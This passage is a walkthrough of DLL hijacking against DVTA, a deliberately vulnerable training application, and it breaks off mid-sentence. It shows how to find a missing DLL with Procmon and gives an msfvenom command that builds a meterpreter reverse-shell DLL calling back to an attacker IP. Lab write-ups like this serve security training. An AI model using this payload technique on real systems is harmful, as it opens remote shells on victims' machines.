DLL Injection:DVTA Walk through
Identify where the missing DLL will be launched when DVTA.exe runs First of all, we need to launch DVTA.exe from the given path and, at the same time, launch Procmon on the windows machine with the admin user. Once the Procmon is launched, go to the menu Filter > Filter to add the DVTA.exe processor name like the following. We might want to add a few more in the filter to see only the specific path and the result status. Normally when performing DLL injection analysis, we need to look for the DLL that the application tries to load, and the result is always "Include Not Found" Once applied the filter the following path looks to be interested for DLL injection Now we know the name of DLL that we want to hijack. So all we have to do is place our malicious DLL in that path and wait for victim to execute the application. We will be creating 64 bit payload with msfvenom. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.22.3 LPORT=4444 -f dll -o DWrite.dll Now we ne...